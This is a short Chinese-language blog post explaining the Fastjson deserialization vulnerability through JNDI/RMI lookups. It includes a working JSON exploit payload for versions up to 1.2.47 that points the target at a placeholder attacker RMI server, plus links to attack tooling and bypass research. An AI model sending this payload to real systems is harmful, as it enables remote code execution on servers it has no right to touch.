fastjson反序列化漏洞原理简述

作为反序列化三大巨头之一，fastjson出现的频率也是很高的，今天就给大家简单描述一下。

• fastjson简介
  Fastjson 是阿里巴巴的开源JSON解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。简单来说就是可以进行类和json格式的字符串互相转换。
• 漏洞原理
  攻击者在本地启一个rmi的服务器，上面挂上恶意的payload
  让被攻击的目标反序列化特定的类，这个类最终会调用lookup()函数，导致jndi接口指向我们的rmi服务器上的恶意payload

jndi是一个Java命令和目录接口，举个例子，通过jndi进行数据库操作，无需知道它数据库是mysql还是ssql，还是MongoDB等，它会自动识别。当然rmi也可以通过jndi实现，rmi的作用相当于在服务器上创建了类的仓库的api，客户端只用带着参数去请求，服务器进行一系列处理后，把运算后的参数还回来

rmi服务器：https://github.com/mbechler/marshalsec

要注意的是jre版本需要和目标服务器版本相同。
官方给出的修复补丁一直都是升级黑名单

github上有人跑出的版本黑名单：https://github.com/LeadroyaL/fastjson-blacklist
目前更新到1.2.71

对于fastjson<=1.2.47有个通用exp：

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
        "autoCommit": true
    }
}

高版本的java对jndi注入进行了限制，由于环境的不同，存在一些方法进行绕过，这里推荐下国外Michael Stepankin大牛的方法。https://www.veracode.com/blog/research/exploiting-jndi-injections-java

本文参考：https://www.jianshu.com/p/35b84eda9292?utm_campaign=haruki
https://www.cnblogs.com/sijidou/p/13121332.html